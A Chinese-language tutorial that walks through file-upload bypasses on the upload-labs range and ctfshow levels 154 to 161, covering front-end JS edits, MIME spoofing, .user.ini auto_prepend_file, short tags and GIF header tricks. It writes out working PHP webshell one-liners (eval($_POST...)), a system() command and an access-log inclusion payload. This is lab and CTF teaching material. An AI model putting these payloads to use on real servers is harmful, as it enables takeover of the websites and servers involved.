目录
1.JS验证
2.JS验证+MIME
3.JS验证+.user.ini
4.JS验证+.user.ini+短标签 (ctfshow154,155关)
5.JS验证+.user.ini+短标签+过滤 [ ]
6.JS验证+.user.ini+短标签+加过滤+文件头
有关文件上传的知识
1.为什么文件上传存在漏洞
上传文件时,如果服务瑞代码未对客户端上传的文件进行严格的验证和过滤,就容易造成可以上传任意文件的情况,包括上传脚本文件(asp、 aspx、php、 jsp等格式的文件)。
2.危害
非法用户可以利用上传的恶意脚本文件控制整个网站,甚至控制服务器。这个恶意的脚本文件,又被称为WebShell,也可将WebShell脚本称为一种网页后门,WebShell脚本具有非常强大的功能,比如查看服务器目录、服务器中的文件,执行系统命令等。
本文知识点:
1、文件上传-前端验证
2、文件上传-黑白名单
3、文件上传-user.in妙用
4、文件上传-PHP语言特性
后门代码需要特定后缀格式解析,不能以图片后缀解析脚本后门代码(解析漏洞除外),如:jpg图片里面有php后门代码,不能被触发,所以连接不上后门
本文将通过upload-labs靶场进行演示说明,关于upload-labs靶场的搭建请参考这篇文章:https://blog.csdn.net/m0_69583059/article/details/135767303?spm=1001.2014.3001.5501
1.JS验证
upload-labs靶场第一关
用哥斯拉生成一个php后门文件,打开哥斯拉点击管理->生成,将生成的后门文件重命名为hm.php(方便演示)
关于哥斯拉的使用和安装请参考这篇文章:哥斯拉安装和使用
上传png文件成功,上传hm.php文件失败
F12修改前端代码
复制php文件路径(http://localhost/upload-labs/upload/hm.php ),用哥斯拉尝试连接
2.JS验证+MIME
upload-labs靶场第二关
这里直接F12修改后是没有用的
通过抓包发现上传png文件时和上传php文件时,Content-Type的值不一样
现在我们将上传php文件时的Content-Type值修改为image/png,我们发现上传成功
3.JS验证+.user.ini
user.ini:auto_prepend_file=hm.png
hm.png:<?php eval($_POST[x]);?>后台对文件后缀进行限制,拦截php等相关后缀,导致后门代码无法上传,这里我们要用到.user.ini注意.user.ini的使用是有条件的,只适用于php,别的语言可能不支持,这里主要讲解思路,语言不一样,但思路都差不多,可以自己去了解一下,别的语言有没有类似与.uer.ini文件这样的功能。
.user.ini 文件是PHP的配置文件,用于自定义PHP的配置选项。该文件通常位于PHP安装目录的根目录下,或者在特定的网站目录下。.user.ini 文件是一个文本文件,可以使用任何文本编辑器进行编辑。它包含了PHP的配置选项和值,每个选项和值都以等号(=)分隔。当php再进行扫描的时候会读取到web目录下的ini文件,从而进行触发。
在这个配置中存在两个配置项:auto_append_file和auto_prepend_file
1.auto_prepend_file
auto_prepend_file表示在每个PHP脚本之前自动加载指定的文件。该文件的内容将被插入到原始脚本的顶部。
2.auto_append_file
和auto_prepend_file类似,这个是指内容添加到文末,如果有exit会无法调用到
upload-labs靶场第五关
源码里把所有可以解析的后缀名都给写死了,包括大小写,转换,空格,还有点号,正常的php类文件上传不了了,并且拒绝上传 .htaccess 文件。反复观察发现没有被限制的后缀名有 .php7 以及 .ini。现在我们该怎么办呢,php文件不能上传,那么我们能不能把后门代码写在png文件里面呢,这样显然是不行的,这样会导致格式错误,这里我们就要用到php特有的.user.ini文件,上面已经介绍过了,.user.ini的配置项auto_prepend_file表示在每个PHP脚本之前自动加载指定的文件,该文件的内容将被插入到原始脚。这是什么意识呢,这里我解释一下,也就是说我们如果直接将后门代码写在png文件下是不能上传的,因为php文件被拦截了,所以这里我们要借auto_prepend_file,将png文件设定为指定文件,这样png文件里面的后门代码就会插入到原脚本(也就是和传入文件同目录的php文件,这里是readme.php), 这样我们就成功将后门代码植入到了php文件中,而index.php文件本来就是项目文件,这样就可以通过index.php连接哥斯拉了。
现在我们创建一个.user.ini文件,在文件里写入auto_prepend_file=hm.png。然后将我们生成的木马文件hm.php改为hm.png,然后将这两个文件上传
现在我们尝试一下用readme.php连接哥斯拉
测试连接成功
4.JS验证+.user.ini+短标签 (ctfshow154,155关)
user.ini:auto_prepend_file=text.png
text.png:<?=eval($_POST[pass]);?>后台对文件后缀以及短标签<?php进行限制,这个时候不但要考虑php后缀文件不能上传,还要考虑后门代码不能出现<?php
这里有几种替换短标签<?php的方法,效果是一样的,一般用第二种和第四种,因为不需要前提条件
1.<?echo '123';?> //前提是开启配置参数short_open_tags=on
2.<?=(表达式)?> //不需要开启参数设置
将<?php eval($_POST[pass]);?>替换成<?=eval($_POST[pass]);?>3.<% echo '123';%> //前提是开启了配置参数asp_tags=on
4.<script language="php">echo '1'</script> //不用修改参数开关
5.JS验证+.user.ini+短标签+过滤 [ ]
过滤[],用{}替代(ctfshow156关)
user.ini:auto_prepend_file=hm.png
hm.png:<?=eval($_POST{pass});?>过滤了后门语句的分号;和php(ctfshow157关)
zm.png:<?=system('tac ../fl*')?> 过滤了;,php,() (ctfshow158,159关)
zm.png:<?echo'tac /var/www/html/f*'?>基本都过滤了(ctfshow160关)
包含默认日志,日志记录UA头,UA头写后门代码
user.ini:auto_prepend_file=zm.png
zm.png:<?=include"/var/lo"."g/nginx/access.lo"."g"?>6.JS验证+.user.ini+短标签+加过滤+文件头
文件头部检测是否为图片格式文件(ctfshow161关)
user.ini:GIF89A auto_prepend_file=zm.png
zm.png:GIF89A <?=include"/var/lo"."g/nginx/access.lo"."g"?>
![[极客大挑战 2019]LoveSQL1](https://img-blog.csdnimg.cn/direct/28129c907eb94c789e119067bbc1d049.png)
